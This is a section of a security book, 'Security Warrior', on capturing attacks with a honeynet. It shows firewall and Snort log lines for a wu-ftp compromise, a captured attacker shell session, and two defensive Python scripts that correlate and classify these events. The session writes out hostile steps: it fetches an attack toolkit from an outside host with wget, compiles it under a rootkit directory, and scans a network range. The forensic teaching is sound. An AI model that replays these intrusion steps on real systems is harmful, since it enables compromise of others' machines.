20.3 Capturing Attacks


Once your honeynet is live, what happens next? Sooner or later you will see events like the ones that follow. Here's a probe, as reported by the iptables firewall:

 Jun 25 18:14:47 fw kernel: INBOUND: IN=eth0 OUT=eth1 SRC=E.V.I.L DST=H.O.N.EY LEN=48  TOS=0x00 PREC=0x00 TTL=113 ID=48230 DF PROTO=TCP SPT=2934 DPT=21 WINDOW=8192 RES=0x00  SYN URGP=0 

This example is the exploit itself, as reported by Snort (the alert that follows it shows that the exploit succeeded):

 06/25-18:15:03.586794 [**] [1:1378:7] FTP wu-ftp file completion attempt [**] [Classification: Misc Attack] [Priority: 2] {TCP} 63.161.21.75:3976 -> 10.1.1.2:21 

Here's an owned system (reported by Snort). Note the direction: the honeypot is now the source, sending the output of an id command that contains uid=0(root) back to the attacker:

 Jun 25 18:17:38 ids snort: [1:498:3] ATTACK RESPONSES id check returned root [Classification: Potentially Bad Traffic] [Priority: 2]: {TCP} 10.1.1.2:21 -> 63.161.21.75:3977 
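The three records above come from two sensors in two different formats, and on a live honeynet you will see many of each. As an added example (not code from the book), here is a small Python correlator that parses the iptables LOG line and both Snort output formats, groups events per attacker/honeypot pair, and orders them into probe, exploit and response stages. The sample input reproduces the section's own three lines; the firewall line's masked addresses E.V.I.L and H.O.N.EY are assumed to be the attacker and honeypot addresses seen in the Snort alerts, and the honeypot set, stage rules and verdict names are this example's own assumptions.

```python
import re
from dataclasses import dataclass
from datetime import datetime
from typing import Dict, List, Optional, Tuple

# Constructed sample input: the three events quoted in this section. The book
# masks the firewall line's addresses as E.V.I.L and H.O.N.EY; here they are
# assumed to be the attacker and honeypot addresses seen in the Snort alerts.
SAMPLE_LOGS = """\
Jun 25 18:14:47 fw kernel: INBOUND: IN=eth0 OUT=eth1 SRC=63.161.21.75 DST=10.1.1.2 LEN=48 TOS=0x00 PREC=0x00 TTL=113 ID=48230 DF PROTO=TCP SPT=2934 DPT=21 WINDOW=8192 RES=0x00 SYN URGP=0
06/25-18:15:03.586794 [**] [1:1378:7] FTP wu-ftp file completion attempt [**] [Classification: Misc Attack] [Priority: 2] {TCP} 63.161.21.75:3976 -> 10.1.1.2:21
Jun 25 18:17:38 ids snort: [1:498:3] ATTACK RESPONSES id check returned root [Classification: Potentially Bad Traffic] [Priority: 2]: {TCP} 10.1.1.2:21 -> 63.161.21.75:3977
"""

HONEYPOTS = {"10.1.1.2"}          # honeynet addresses (assumed for the example)
TCP_FLAGS = {"SYN", "ACK", "FIN", "RST", "PSH", "URG"}

# iptables LOG target output, as relayed by syslog from the firewall kernel.
IPTABLES_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ kernel: .*?SRC=(?P<src>\S+) DST=(?P<dst>\S+)"
    r" .*?PROTO=(?P<proto>\w+) SPT=(?P<sport>\d+) DPT=(?P<dport>\d+)")
# Snort "fast" alert-file format, and Snort alerts relayed through syslog.
SNORT_RES = [
    re.compile(r"^(?P<ts>\d\d/\d\d-\d\d:\d\d:\d\d)\.\d+ \[\*\*\] \[(?P<sid>[\d:]+)\] (?P<msg>.*?) \[\*\*\]"
               r" .*?\{(?P<proto>\w+)\} (?P<src>\S+):(?P<sport>\d+) -> (?P<dst>\S+):(?P<dport>\d+)"),
    re.compile(r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ snort: \[(?P<sid>[\d:]+)\] (?P<msg>.*?) \[Classification:"
               r".*?\{(?P<proto>\w+)\} (?P<src>\S+):(?P<sport>\d+) -> (?P<dst>\S+):(?P<dport>\d+)"),
]
TS_FORMATS = ("%b %d %H:%M:%S", "%m/%d-%H:%M:%S")   # neither log carries a year


@dataclass
class Event:
    ts: datetime
    stage: str         # "probe", "exploit" or "response"
    attacker: str
    honeypot: str
    service_port: int  # port on the honeypot side of the connection
    detail: str


def parse_ts(text: str) -> datetime:
    for fmt in TS_FORMATS:
        try:
            return datetime.strptime(text, fmt)
        except ValueError:
            pass
    raise ValueError(f"unrecognised timestamp: {text!r}")


def parse_line(line: str) -> Optional[Event]:
    """Classify one log line into an attack stage, or None if it is not relevant."""
    m = IPTABLES_RE.match(line)
    if m:
        flags = TCP_FLAGS & set(line.split())
        # A bare SYN towards a honeypot is a probe; other firewall lines are ignored.
        if m["dst"] in HONEYPOTS and m["proto"] == "TCP" and flags == {"SYN"}:
            return Event(parse_ts(m["ts"]), "probe", m["src"], m["dst"], int(m["dport"]),
                         f"TCP SYN to port {m['dport']}")
        return None
    for rx in SNORT_RES:
        m = rx.match(line)
        if not m:
            continue
        if m["msg"].startswith("ATTACK RESPONSES") and m["src"] in HONEYPOTS:
            # Direction is reversed: the honeypot is answering the attacker.
            return Event(parse_ts(m["ts"]), "response", m["dst"], m["src"], int(m["sport"]),
                         f"{m['sid']} {m['msg']}")
        if m["dst"] in HONEYPOTS:
            return Event(parse_ts(m["ts"]), "exploit", m["src"], m["dst"], int(m["dport"]),
                         f"{m['sid']} {m['msg']}")
    return None


def verdict_for(events: List[Event]) -> str:
    stages = [e.stage for e in events]
    if "response" in stages:
        if "exploit" in stages[:stages.index("response")]:
            return "compromised"
        # Root answered without a matching exploit alert: a rule gap or skewed clocks.
        return "response without a preceding exploit alert"
    if "exploit" in stages:
        return "exploit attempted"
    return "probed"


def build_attack_chains(log_text: str) -> Dict[Tuple[str, str], dict]:
    """Group events per (attacker, honeypot) pair and order them into an attack chain."""
    chains: Dict[Tuple[str, str], List[Event]] = {}
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev:
            chains.setdefault((ev.attacker, ev.honeypot), []).append(ev)
    result = {}
    for pair, events in chains.items():
        # Ordering assumes the firewall and IDS clocks agree (NTP on every sensor).
        events.sort(key=lambda e: e.ts)
        result[pair] = {
            "events": events,
            "verdict": verdict_for(events),
            "service_port": events[0].service_port,
            "elapsed_seconds": int((events[-1].ts - events[0].ts).total_seconds()),
        }
    return result


if __name__ == "__main__":
    for (attacker, honeypot), chain in build_attack_chains(SAMPLE_LOGS).items():
        print(f"{attacker} -> {honeypot} port {chain['service_port']}: "
              f"{chain['verdict']} in {chain['elapsed_seconds']} s")
        for ev in chain["events"]:
            print(f"  {ev.ts:%H:%M:%S} {ev.stage:<9} {ev.detail}")
```

On the section's three lines the correlator reports the attacker as compromising the honeypot's port 21 within 171 seconds of the first SYN. The "response without a preceding exploit alert" verdict is the check worth keeping: an id check returning root with no exploit alert in front of it means either Snort has no signature for the exploit that was used or the firewall and IDS clocks disagree, and both are things you want to find out from a honeynet rather than from a production box.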

The next example is an attacker's command session, in which he checks who is on the system, secures it, fetches his attack scanner, and starts looking for more boxes to exploit (this is the actual captured session; only the web address has been modified):

 w
 ls
 cd /dev/ida
 ls
 echo "anonymous" >> /etc/users
 echo "ftp" >>/etc/ftpusers
 echo "anonymous" >>/etc/ftpusers
 echo "anonymous" >> /etc/user
 wget www.geocities.com/replaced_for_privacy/awu.tgz
 tar zxvf awu.tgz
 cd aw
 make
 ./awu 63.190

It is interesting to note that with cd /dev/ida; ls the attacker checks whether his rootkit installed correctly in this location. He also performs some simple system hardening to prevent re-exploitation by his "friends": appending ftp and anonymous to /etc/ftpusers disables anonymous FTP logins, which closes the particular hole he came in through (the two similar lines written to /etc/users and /etc/user look like mistyped attempts at the same edit; neither file is consulted by the FTP daemon). Locking the door behind oneself in this way is standard practice among modern script kiddies.
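Reading a keystroke capture by hand works for thirteen commands; on a busy honeynet you want the same interpretation automated. The following Python script is an added example, not part of the book: it replays the session above, tracks the working directory so that the ls issued after cd /dev/ida is recognised as a check of the rootkit directory, extracts the /etc/ftpusers lock-out entries, and records the download, build and scan steps. The rootkit-directory and lock-out-file lists, the assumed starting directory /root and the category names are this example's own; the session text is the one captured above, with the URL already redacted by the book.

```python
import re
from dataclasses import dataclass
from posixpath import join, normpath
from typing import List

# The attacker's keystrokes as captured in this section (the download URL was
# already redacted in the book; nothing else is changed).
CAPTURED_SESSION = """\
w
ls
cd /dev/ida
ls
echo "anonymous" >> /etc/users
echo "ftp" >>/etc/ftpusers
echo "anonymous" >>/etc/ftpusers
echo "anonymous" >> /etc/user
wget www.geocities.com/replaced_for_privacy/awu.tgz
tar zxvf awu.tgz
cd aw
make
./awu 63.190
"""

ROOTKIT_DIRS = {"/dev/ida"}        # rootkit locations to watch (the text names this one)
LOCKOUT_FILES = {"/etc/ftpusers"}  # files attackers edit to keep other intruders out
APPEND_RE = re.compile(r'^echo\s+"?([^">]+?)"?\s*>>\s*(\S+)$')   # echo VALUE >> FILE
PREFIX_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){0,3}$")           # IP address or prefix


@dataclass
class Step:
    cwd: str       # working directory when the command ran, tracked from cd
    command: str
    category: str
    note: str = ""


def resolve(cwd: str, target: str) -> str:
    return normpath(target if target.startswith("/") else join(cwd, target))


def analyse_session(text: str, start_cwd: str = "/root") -> dict:
    """Walk the keystroke log once, tracking cwd, and tag what each command reveals."""
    cwd = start_cwd
    steps: List[Step] = []
    summary = {"rootkit_dirs": set(), "lockout": {}, "downloads": [],
               "build_dirs": [], "scan_targets": [], "stray_writes": []}
    for raw in text.splitlines():
        cmd = raw.strip()
        if not cmd:
            continue
        argv = cmd.split()
        name, args = argv[0], argv[1:]
        m = APPEND_RE.match(cmd)
        if name in ("w", "who", "last"):
            step = Step(cwd, cmd, "recon", "checks who else is logged in")
        elif name == "cd":
            cwd = resolve(cwd, args[0]) if args else start_cwd
            if cwd in ROOTKIT_DIRS:
                summary["rootkit_dirs"].add(cwd)
            step = Step(cwd, cmd, "navigate")
        elif name == "ls" and cwd in ROOTKIT_DIRS:
            step = Step(cwd, cmd, "rootkit_check", f"verifies the rootkit files in {cwd}")
        elif name == "ls":
            step = Step(cwd, cmd, "recon")
        elif m:
            value, path = m.group(1), resolve(cwd, m.group(2))
            if path in LOCKOUT_FILES:
                summary["lockout"].setdefault(path, []).append(value)
                step = Step(cwd, cmd, "lockout", f"denies FTP login for '{value}'")
            else:
                summary["stray_writes"].append(path)
                step = Step(cwd, cmd, "file_write", f"{path} is not read by any standard service")
        elif name in ("wget", "curl", "ftp", "tftp", "lynx"):
            summary["downloads"].append(args[-1] if args else "")
            step = Step(cwd, cmd, "download", "fetches a toolkit")
        elif name in ("tar", "gunzip", "unzip"):
            step = Step(cwd, cmd, "unpack")
        elif name in ("make", "gcc", "cc"):
            summary["build_dirs"].append(cwd)
            step = Step(cwd, cmd, "build", "compiles the tool on the victim")
        elif name.startswith("./") and args and PREFIX_RE.match(args[0]):
            summary["scan_targets"].append(args[0])
            step = Step(cwd, cmd, "scan", f"runs {resolve(cwd, name)} against {args[0]}")
        else:
            step = Step(cwd, cmd, "other")
        steps.append(step)
    summary["steps"] = steps
    summary["rootkit_dirs"] = sorted(summary["rootkit_dirs"])
    return summary


if __name__ == "__main__":
    report = analyse_session(CAPTURED_SESSION)
    for st in report["steps"]:
        print(f"{st.cwd:<14} {st.category:<13} {st.command:<50} {st.note}")
    print("rootkit dirs:", report["rootkit_dirs"], "| lockout:", report["lockout"],
          "| scan targets:", report["scan_targets"])
```

Tracking the working directory is what turns a bare ls into evidence: the same command is ordinary reconnaissance in a home directory and a rootkit check inside /dev/ida. The summary also shows the toolkit was unpacked and compiled under the rootkit directory and then pointed at a /16 prefix, which is the moment the honeynet's outbound rate limiting has to earn its keep.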



Security Warrior
ISBN: 0596005458
Year: 2004